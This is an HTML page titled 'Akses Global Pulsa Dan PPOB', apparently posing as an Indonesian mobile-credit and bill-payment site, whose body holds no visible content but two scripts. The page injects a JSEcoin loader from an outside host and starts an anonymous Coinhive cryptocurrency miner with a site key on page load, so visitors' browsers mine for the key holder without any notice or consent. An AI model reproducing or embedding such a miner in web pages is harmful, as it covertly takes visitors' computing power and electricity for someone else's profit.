<!DOCTYPE html>
<html>
<head>
<title>Akses Global Pulsa Dan PPOB</title>
</head>
<body>

<script type="text/javascript">
(function() {
var trackingurl = 'https://load.jsecoin.com/server/load/3919/noweb/nojs/0/';
var d=document, j=d.createElement('script'), s=d.getElementsByTagName('script')[0];
j.type='text/javascript'; j.async=true; j.defer=true; j.src=trackingurl; s.parentNode.insertBefore(j,s);
})();
</script>

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('lhI8RwL0rYaOhy6lQD9SKkjc2hvLAdyM');
	miner.start();
</script>
	
</body>
</html>
